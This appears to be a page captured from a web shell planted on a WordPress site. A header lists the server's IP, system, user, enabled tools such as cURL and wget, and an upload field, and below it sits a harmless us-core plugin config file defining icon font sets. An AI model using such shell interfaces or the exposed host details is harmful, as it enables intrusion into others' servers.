. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 162.0.212.4 / Your IP :
216.73.216.14 [
Web Server : LiteSpeed System : Linux premium146.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : alshnoli ( 2431) PHP Version : 8.3.28 Disable Function : NONE Domains : 1 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/alshnoli/public_html/wp-content/plugins/us-core/config/ |
Upload File : |
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * Icon sets for theme "icon" control * * @filter us_config_assets */ return array( 'fas' => array( // used in Icon Picker control UI 'set_name' => 'Font Awesome Solid', 'set_url' => 'https://fontawesome.com/icons?s=solid', // used in generating CSS styles 'font_family' => 'fontawesome', 'font_weight' => '900', 'font_file_name' => 'fa-solid-900', 'css_file_name' => 'font-awesome', ), 'far' => array( 'set_name' => 'Font Awesome Regular', 'set_url' => 'https://fontawesome.com/icons?s=regular', 'font_family' => 'fontawesome', 'font_weight' => '400', 'font_file_name' => 'fa-regular-400', 'css_file_name' => 'font-awesome', ), 'fal' => array( 'set_name' => 'Font Awesome Light', 'set_url' => 'https://fontawesome.com/icons?s=light', 'font_family' => 'fontawesome', 'font_weight' => '300', 'font_file_name' => 'fa-light-300', 'css_file_name' => 'font-awesome', ), 'fad' => array( 'set_name' => 'Font Awesome Duotone', 'set_url' => 'https://fontawesome.com/icons?s=duotone', 'font_family' => 'Font Awesome 5 Duotone', 'font_weight' => '900', 'font_file_name' => 'fa-duotone-900', 'css_file_name' => 'font-awesome-duotone', 'additional_css' => 'position: relative;', ), 'fab' => array( 'set_name' => 'Font Awesome Brands', 'set_url' => 'https://fontawesome.com/icons?s=brands', 'font_family' => 'Font Awesome 5 Brands', 'font_weight' => '400', 'font_file_name' => 'fa-brands-400', ), 'material' => array( 'set_name' => 'Material Icons', 'set_url' => 'https://material.io/icons/', 'font_family' => 'Material Icons', 'font_weight' => '400', 'font_file_name' => 'material-icons', 'additional_css' => 'font-style: normal;letter-spacing: normal; text-transform: none; display: inline-block; white-space: nowrap; word-wrap: normal; direction: ltr; font-feature-settings: "liga"; -moz-osx-font-smoothing: grayscale;', ), );